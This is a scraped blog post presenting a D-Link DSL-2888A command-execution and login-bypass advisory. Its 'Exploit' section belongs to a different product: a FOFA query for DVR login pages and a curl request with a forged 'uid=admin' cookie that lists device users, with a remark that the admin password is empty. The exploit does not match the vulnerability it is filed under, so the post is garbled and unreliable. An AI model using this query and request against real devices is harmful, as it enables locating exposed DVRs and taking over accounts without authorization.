D-Link DSL-2888A remote command execution vulnerability (CVE-2020-24581/24579)

Others 2021-03-22 00:03:08 views: null

Vulnerability details

D-Link DSL-2888A AU_2.31_V1.1.47ae55 earlier versions exist and remote command execution vulnerability, the vulnerability stems from the inclusion of a execute cmd.cgi feature (not accessible through the web user interface), which allows authenticated users to execute Operating system commands. There is also an insecure authentication vulnerability (CVE-2020-24580) in this version of the firmware. Enter any password in the login interface to successfully access the router interface. By combining these two vulnerabilities, unauthorized arbitrary code execution can be achieved.
 

Vulnerability impact

Version before AU_2.31_V1.1.47ae55

EG_1.00b4

Exploit

fofa :header="Server: GNU rsp/1.0" title="DVR LOGIN"

curl "http://ip/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

The user name admin is obtained here, and the password is empty, so you can log in

Guess you like

Origin blog.csdn.net/qq_44159028/article/details/114591452
Recommended
Ranking
ElasticSearch-- data modeling best practices
Permission Maintenance - Shadow User Backdoor
Refactor the code using MVP mode
Quantitative investment-fundamental model-PVC multi-factor model
Spark Big Data Processing Lecture Notes 3.2 Mastering RDD Operators
Blazor page components (2)
Erlernen von Kenntnissen zur Android-Entwicklung – Kodierung, Verschlüsselung, Hash, Serialisierung und Zeichensätze
About Qi high in JAVA study notes SORM summary detailed personal explanation
Will you calculate the accuracy of the rope displacement sensor in the measurement?
OPENJTAG debugging learning (3): debugging using the gdb command line
Daily
More
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)

Code World

© 2018 codetd.com